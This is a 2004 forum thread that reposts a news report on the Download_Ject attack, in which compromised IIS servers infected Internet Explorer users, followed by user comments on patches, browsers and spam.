Interesting idea, but no problem here. Go about your business, citizen.
Posted on 06/25/2004 11:40:59 AM PDT by demlosers
Internet security organizations are warning that dozens of major Internet sites, and potentially thousands of Web sites across the Internet, are currently under attack.
Several Web administrators from major companies said their Windows-based Web servers were compromised despite being up to date on security patches, security analysts reported.
"We've been watching activity since last Sunday, but it's now hit a critical mass," says Marcus Sachs, director of the SANS Internet Storm Center, who is in communications with Homeland Security's National Cyber Security division about the attack.
The attack appears to be one of the most sophisticated Internet attacks to date. The attackers are compromising and infecting E-commerce and corporate Web sites with malicious code. That code is used to infect Web surfers' using certain versions of Internet Explorer.
Security experts say Web surfers visiting these sites are at risk of having their machines infected with Trojan horse applications, used to hijack computers, as well as keystroke loggers, which are capable of stealing personal information such as financial account numbers and passwords.
It's not clear if the latest Internet Explorer patches are able to protect users' systems from becoming infected. Internet security firm Symantec's DeepSight Threat Alert says IE users are being infected through a known, but still unpatched, Internet Explorer flaw.
Syamantec's BugTraq ID for the flaws are 10472 and 10473. More information about these flaws are available at http://www.securityfocus.com/bid/10472 and http://www.securityfocus.com/bid/10473 .
Security experts have been studying the attack and are unclear about the motive behind it. Some say the attacks can be traced to a Russian Web IP address of known spammers; others say the attack is designed to steal consumers' financial information.
Daniel J. Frasnelli, manager of the technical assistance center for managed security services provider NetSec, says it started monitoring the attack activity early Thursday and immediately notified its security customers.
NetSec wouldn't disclose the names of the E-commerce sites under attack, citing legal fears, but Frasnelli said infected sites include a major auction site, an auto-pricing site, and search-engine sites. "We all know these sites," he says.
Security researchers say it's not yet clear how the attackers have compromised these Web sites. "It'll take some considerable forensic examinations," says Alfred Huger, senior director of engineering for Internet security firm Symantec.
It appears that the attackers are compromising Web servers running Microsoft's Internet Information Services, either because they aren't patched or through a newfound software vulnerability.
Web surfers who visit infected sites are infected via gif images or other Web-site objects that have malicious code attached to them, including keystroke loggers and Trojan horse applications.
"Our big concern is that there is a zero-day vulnerability in IIS," Sachs says.
Microsoft is investigating the attacks. The software vendor issued a statement saying that "at 4:00 pm PT [Thursday], Microsoft began investigating reports that some customers running unprotected versions of IIS 5.0, a component of Windows 2000 Server, were being targeted."
Microsoft and Symantec say these sites are being hit with a malicious application known as Download_Ject.
At 3 a.m. Friday, Microsoft issued a statement saying that "early indications suggest" that unpatched IIS 5.0 Servers are the systems targeted in the attack. Microsoft said the servers have not been updated with the patch included in Microsoft security bulletin April MS04-011. "Customers should ensure they have installed MS04-011 to help secure against the issues corrected by that security update," the company said.
Microsoft is also urging its customers to download and install the IE patch included with Microsoft Security Bulletin MS04-013 and that they "utilize high security settings" in Internet Explorer.
To help defend against the attack, Microsoft is urging consumers to read http://www.microsoft.com/security/incident/settings.asp. It's also asking its business customers to read http://support.microsoft.com/default.aspx?scid=kb;en-us;833633 to "minimize risk." Microsoft corporate customers that have deployed XP SP2 RC2 are not at risk to the attack, the company said.
Most major antivirus companies plan to update their antivirus software to spot systems infected with the back doors and keystroke loggers associated with this attack.
Microsoft says unpatched IIS systems only, security guys say even unpatched systems. We'll have to wait to see who's right.
Now IE + IIS is an extremely deadly combination. Luckily for the Web, most sites aren't served by IIS 5 (BTW, 6 is much better, very Apache-like in ways). Now we just need to get people off IE to solve the other half of the problem.
At least I know I can surf safe with Firefox (recent convert from Mozilla).
Skynet?
This sucks. I guess its a weekend of downloading updates and patches.
Seems like it's only fair to bump you, given your glee whenever linux hiccups.
lol!
Is Mozilla used in conjunction with an anti-virus program better than Mailwasher to stop spam & viruses? In the past 3-4 weeks, I've been inundated with that garbage. I'm well over 1,000 spam & viruses and counting of the garbage I've been receiving.
Say. That's a really nice bike.
In the last 24 hours my firewall has blocked over 1100 intrusions and blocked 500 attempted accesses.
Sadly, I've got you beat.
I've gotten email from a lib who took offense at my Conservative comments on another site, got my email address and is bombarding me with 2,000-3,000 emails a day, including porn, refinancing, viagara, e-universities, about.com, etc etc etc.
Fortunately, Netscape's v7.1 has a junk filter control which intercepts 95% of it, and Norton AV grabs the dozens of viruses which are seeded in amongst all the email spam.
I'd like to get him alone in a room for 60secs.
I have noticed that Windows zealots tend to cackle hysterically during the relatively rare occasions that a Linux exploit goes public. One thing they fail to mention, though, is that Linux exploits are usually pretty esoteric, usually discovered by an engineer somewhere before they have actually been exploited, and are generally fixed within a day or two.
Important difference. Linux hiccups. Winderz vomits on its user. The Microsoft exploit handling model is thus:
Deny. Deny. Strongly Deny. Release kludge. Continue to deny. Sue whistle-blowers. Deny. Pretend it never happened. Elapsed time: 30 days to six months.
I've noticed today that the ad agency/media providers -- like tribalfusion.com and fastclick.net -- seem to be worst affected. Would be fine with me, except it hangs up access to the referring web pages.
Yeah, I know what you mean. I visualize myself with a bazooka aimed at that spam and/or virus sender and blowing him/her to kingdom come. Think I'm going to solve some of the problem. I'm leaving town for four weeks and my ISP will be disconnecting me to try and solve the problem. That email should be bounced back real quickly with some message that the email can't be sent.
Two words, "Zone Alarm"
Have you tried complaining to this person's ISP? There is not an ISP on the planet that will tolerate that kind of behavior. And if you can't get his/her ISP's attention, your ISP certainly can since that kind of flooding has a real dollar cost associated with it. This person wouldn't find their stunt so amusing after being blackballed by ISPs.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.